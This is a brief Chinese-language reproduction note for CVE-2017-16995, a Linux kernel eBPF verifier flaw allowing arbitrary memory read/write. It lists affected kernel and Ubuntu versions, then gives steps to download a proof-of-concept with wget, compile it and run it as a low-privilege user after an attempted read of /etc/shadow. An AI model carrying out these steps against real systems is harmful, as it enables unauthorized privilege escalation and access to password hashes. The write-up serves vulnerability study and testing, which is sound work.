CVE-2017-16995
0x01 概述:
该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。
0x02 影响版本:
Linux内核:Linux Kernel Version 4.14 ~ 4.4
Ubuntu版本:16.04.01~ 16.04.04
0x03 复现:
1)复现版本:ubuntu-16.04.3-server-amd64.iso
2)使用普通账号密码secquan/secquan登录
3)查看用户ID(id)与版本(cat/proc/version )
4)查看密码,提示无权限(cat/etc/shadow)
5)下载poc代码(wget http://cyseclabs.com/pub/upstream44.c)
6)下载并编译gcc(sudo apt install gcc)【ps:此处需要输入secquan密码】
7)使用gcc编译poc(gcc -o secquan upstream44.c)
8)运行secquan文件(./secquan)